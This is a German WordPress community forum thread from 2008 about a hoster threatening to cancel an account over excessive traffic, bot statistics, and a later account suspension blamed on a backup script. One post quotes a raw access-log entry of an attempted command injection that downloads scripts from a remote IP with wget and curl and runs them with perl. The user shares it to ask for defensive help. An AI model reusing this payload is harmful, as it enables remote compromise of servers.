1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Hoster droht mit kündigung wegen Skript Fehler

Dieses Thema im Forum "Webhosting-Provider" wurde erstellt von Heinrich-Uwe, 14. April 2008.

  1. Putzlowitsch

    Putzlowitsch Well-Known Member

    Registriert seit:
    21. Oktober 2006
    Beiträge:
    5.955
    Zustimmungen:
    47
    Könne auch was den Update-Services (Pingdiensten) zu tun haben, rpc.pingomatic.com hat z.B. auch die IP-Adresse 72.233.56.138 (und 72.233.56.139).

    Gruß
    Ingo
     
  2. Heinrich-Uwe

    Heinrich-Uwe Well-Known Member

    Registriert seit:
    17. Juli 2006
    Beiträge:
    83
    Zustimmungen:
    0
    Ich habe eine Anfrage gestellt mal sehen ob ich eine Antwort bekommen.

    Kommisch ist das auch andere RSS Systeme und Robots/Spiders ganz schön zuschlagen..

    WordPress1482119102.94 GB16 Apr 2008 - 05:12 Unknown robot (identified by 'crawl')33143821.58 MB09 Apr 2008 - 17:23 MJ12bot1858+580.47 MB16 Apr 2008 - 02:31 Yahoo Slurp1427+8759.42 MB16 Apr 2008 - 05:17 Googlebot129441.17 MB16 Apr 2008 - 03:56 Unknown robot (identified by 'robot')702+115.99 MB15 Apr 2008 - 16:18 MSNBot-media5258.12 MB12 Apr 2008 - 08:35 Google AdSense353+29.80 MB16 Apr 2008 - 03:27 Feedfetcher-Google27913.91 MB16 Apr 2008 - 04:59 Java (Often spam bot)1342.21 MB15 Apr 2008 - 12:43 Exabot
    Seit der update 2.5 Laufen auch RSS Importe Amok und nehmen alte Nachrichten als neu aber ich kan mir nicht vorstellen das das am Server liegen soll oder ?
     
  3. Putzlowitsch

    Putzlowitsch Well-Known Member

    Registriert seit:
    21. Oktober 2006
    Beiträge:
    5.955
    Zustimmungen:
    47
    Sehr unübersichtlich, die Liste. Schalte doch mal unten die Optionen
    [ ] Links automatisch umwandeln
    [ ] Automatically retrieve titles from external links
    aus und setze die Liste als Code ein.

    Den ersten Wert 1482119102.94 GB finde sehr utopisch, das wären ja 1.48 Exa-Byte, das dürfte selbst theoretisch nicht möglich sein.

    Gruß
    Ingo
     
  4. Heinrich-Uwe

    Heinrich-Uwe Well-Known Member

    Registriert seit:
    17. Juli 2006
    Beiträge:
    83
    Zustimmungen:
    0
    [http://oberlausitz-digital.de/img/liste.jpg
    da gibts die Liste als Capture ....
     
  5. MaD

    MaD Well-Known Member
    Ehrenmitglied

    Registriert seit:
    28. Januar 2006
    Beiträge:
    3.097
    Zustimmungen:
    0
    ist sehr unglücklich die Schreibweise ... ist aber die Anzahl der Hits und der Traffic ... da wäre ein Leerzeichen schon sehr passend
     
  6. Putzlowitsch

    Putzlowitsch Well-Known Member

    Registriert seit:
    21. Oktober 2006
    Beiträge:
    5.955
    Zustimmungen:
    47
    Aha, im Capture sieht das schon plausibler aus :)
    So ungewöhnlich hoch finde ich die anderen Werte für einen halben Monat, von WP mal abgesehen, gar nicht.

    Wie oben schon erwähnt, es könnte auch irgendwas mit pingomatic.com zu tun haben. Macht der Pingdienst eigentlich jedes mal auch einen Backping auf die übertragene Seite? Wenn da vielleicht irgendwas schief läuft? Kenn mich da nicht so aus.
    Der ping.wordblog.de macht das zumindest.

    Gruß
    Ingo
     
    #26 Putzlowitsch, 16. April 2008
    Zuletzt bearbeitet: 16. April 2008
  7. Heinrich-Uwe

    Heinrich-Uwe Well-Known Member

    Registriert seit:
    17. Juli 2006
    Beiträge:
    83
    Zustimmungen:
    0
    wen ich davon ausgehe das der blog erst 5 Tage online ist finde ich schon
     
  8. Putzlowitsch

    Putzlowitsch Well-Known Member

    Registriert seit:
    21. Oktober 2006
    Beiträge:
    5.955
    Zustimmungen:
    47
    Das verstehe ich jetzt nicht. Das Blogarchiv reicht bis Januar 2006 zurück und Du bist aber erst 5 Tage online?
    Na egal, selbst für 5 Tage sind z.B. 1400 Abrufe vom Yahoo-Slurp normal. Yahoo ruft innerhalb von 5 Tagen bei mir etwa 2000 mal ab, Google (ohne Feedfetcher u.a.) 750 mal. Alles im grünen Bereich, würde ich sagen, nur die Sache mit WP ist nicht normal.

    Gruß
    Ingo
     
  9. Alphawolf

    Alphawolf Well-Known Member
    Ehrenmitglied

    Registriert seit:
    31. Mai 2005
    Beiträge:
    3.315
    Zustimmungen:
    0
    Mich würde mal der Access Log interessieren, was genau er denn alles crawlt. Nur immer die Startseite kann ja nicht sein.
     
  10. Putzlowitsch

    Putzlowitsch Well-Known Member

    Registriert seit:
    21. Oktober 2006
    Beiträge:
    5.955
    Zustimmungen:
    47
    Rein rechnerisch kommt das aber mit der Startseite recht gut hin.
    Größe der Startseite (nur diese): 76,2k
    Abrufe durch IP 72.233.56.138: 1482119
    Das ergibt etwa 107 GB, angezeigt sind 103. Ist halt noch die Frage, ob 1024 oder 1000 beim Umrechnen genommen wird.

    Gruß
    Ingo
     
  11. Alphawolf

    Alphawolf Well-Known Member
    Ehrenmitglied

    Registriert seit:
    31. Mai 2005
    Beiträge:
    3.315
    Zustimmungen:
    0
    Na dann bin ich ja mal auf die Antwort von wp.org gespannt.

    :twisted: :mrgreen:
     
  12. Heinrich-Uwe

    Heinrich-Uwe Well-Known Member

    Registriert seit:
    17. Juli 2006
    Beiträge:
    83
    Zustimmungen:
    0
    Der Blog ist schon Älter den gabs schon auf netz-effect.net brauchste blos bei Goggle mal angeben ....
    Oberlausitz-Digital.de hatte ich nur aufgelinkt und ihn jetzt erst als neuen server eingerichtet da ich einer galeie im hintergrund noch mit cs 32 000 Fotos laufen ....

    der grund wird sicher sein das der Server als neu erkannt wird und nicht als alt aber die sitemap.xml ist in ortng und aktuell.

    der Server umzug ist warscheinlich mit der grund dafür

    die Access Log wurde wegen übergröße vom hoster leider gelöscht ....

    nun Heute am 17.04.2008 noch keine Antwort erhalten .....
     
    #32 Heinrich-Uwe, 16. April 2008
    Zuletzt bearbeitet: 17. April 2008
  13. Heinrich-Uwe

    Heinrich-Uwe Well-Known Member

    Registriert seit:
    17. Juli 2006
    Beiträge:
    83
    Zustimmungen:
    0
    Also ich habe keine Antwort bis jetzt von wp.org erhalten ....

    aber ansonsten hat sich alles wider normalisiert ....
     
  14. TechnoLogiY

    TechnoLogiY Member

    Registriert seit:
    25. Juni 2008
    Beiträge:
    8
    Zustimmungen:
    0
    Der Hoster darf dich nach geltenden Gesetzen aufgrund Datenaufkommen NICHT kündigen, da in deinem Angebot (wie du sagtest) kein providerseitiges Limit besteht. Aber: Er darf dich kündigen, wenn in den AGB etwas von E-Mail-Versand steht mit einer Angabe eines Maximums (wieviele E-Mails stündlich vershcickt werden dürfen). Und solange keine 1000 Mails pro Minute verschickt werden, ist das rechtlich gesehen inakzeptabel. Sollte er dich trotzdem kündigen, würde ich entweder zum Anwalt oder in die nächstgelegene Verbraucherzentrale gehen ;)
     
  15. Shadow

    Shadow Well-Known Member

    Registriert seit:
    12. Februar 2007
    Beiträge:
    2.970
    Zustimmungen:
    57
    Traffic attacs

    auch ich habe seit wenigen Tagen überhäuft Traffic attacs

    zb im Logfile



    195.130.126.177 [20/Jun/2008:20:21:42 +0200] "GET /wp-pass.php?_wp_http_referer=http://201.70.9.109/cmd.txt?&cmd=killall%20-9%20perl;rm%20ip1.txt;rm%20ros1.txt;rm%20scanasc.txt;wget%20http://201.70.9.109/ip1.txt;wget%20http://201.70.9.109/ros1.txt;wget%20http://201.70.9.109/scanasc.txt;curl%20-o%20ip1.txt%20http://201.70.9.109/ip1.txt;curl%20-o%20ros1.txt%20http://201.70.9.109/ros1.txt;curl%20-o%20scanasc.txt%20http://201.70.9.109/scanasc.txt;perl%20ip1.txt;perl%20ros1.txt;perl%20scanasc.txt

    wobei ich keine Probleme mit Wordpress feststellen kann, nur das diese und weitere ähnliche Logfile einträge vorhanden sind, ohne ergebniss für den aufrufer.
    nur eben ungut weil viel Traffic produziert wird.
    selbst meinem hoster ist unklar warum und was man auf die schnelle dagegen tun kann.
    weis jemand allgemein dazu einen rat
    aja die Domaine ist ein kleine freunde infoportal fotoalbum von bergsteiger, also nicht anrüchiges oder verwerfliches. wo attacs jemandes etwas bringen

    mfg franz
     
  16. Monika

    Monika Well-Known Member
    Ehrenmitglied

    Registriert seit:
    4. Juni 2005
    Beiträge:
    14.126
    Zustimmungen:
    2
    suche bot-trap.de und registrier dich stell dich vor und nutze deren Datei,

    die schickt diese und andre böse bots ins Nirwana,

    hilft ungemein

    lg
     
  17. ststone

    ststone Well-Known Member

    Registriert seit:
    30. Januar 2006
    Beiträge:
    67
    Zustimmungen:
    0
    Hallo und guten Morgen Miteinander

    Ich habe ein ähnliches Problem. Mein Hoster hat meinen Blog gesperrt und mir geschrieben:

    wir mussten die Seite deaktivieren, da sie bzw. ein Script von dieser Seite uns ca. 2,5 TB Traffic verursachte, was so nicht tragbar ist. Dieses war auch dafür verantwortlich, dass der Server nicht in seiner gewohnten Geschwindigkeit arbeiten konnte.

    Nach dem ich nachgefragt habe, was es denn für ein Script genau gewesen sein soll bekam ich folgende Antwort:

    ich bin mir nicht ganz sicher, aber ich gehe von aus, dass ihr Backup Programm (irgendwas mit dump) den Traffic verursacht. Der Traffic war über FTP ausgehend (deswegen zeigt Confixx den Traffic auch nicht an).

    Da ich leider keinen Zugriff mehr auf meinen Account habe, kann ich auch keine Logfiles zur Verfügung stellen. Ich nutze kein Backup und kann mir deshalb auch nicht vorstellen, woher der Traffic stammt.

    Kann mir jemand von euch weiterhelfen?
    Gruss Stefan
     
  18. Monika

    Monika Well-Known Member
    Ehrenmitglied

    Registriert seit:
    4. Juni 2005
    Beiträge:
    14.126
    Zustimmungen:
    2
    schnell sogar

    lg
     
  19. ststone

    ststone Well-Known Member

    Registriert seit:
    30. Januar 2006
    Beiträge:
    67
    Zustimmungen:
    0
    Zusätzlich hat mein Hoster jetzt noch geantwortet:

    in Ihren Ordnern liegt mehrfach ein Ordner Namens "mysqldumper". Ich gehe davon aus, das dieses das entsprechende Trafficverursachende Script ist.
    Bitte haben Sie Verständniss, dass ich nciht einfach so Ihren Account wieder freischalten kann, da diese uns Kosten von ca. 500 Euro verursacht hat.


    Weiss jemand was dieser "mysqldumper" ist und wie ich den deaktivieren kann?
     
  20. Alphawolf

    Alphawolf Well-Known Member
    Ehrenmitglied

    Registriert seit:
    31. Mai 2005
    Beiträge:
    3.315
    Zustimmungen:
    0
    Weiter zu diesem Thema geht es hier.
     
    #40 Alphawolf, 12. August 2008
    Zuletzt bearbeitet: 12. August 2008
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden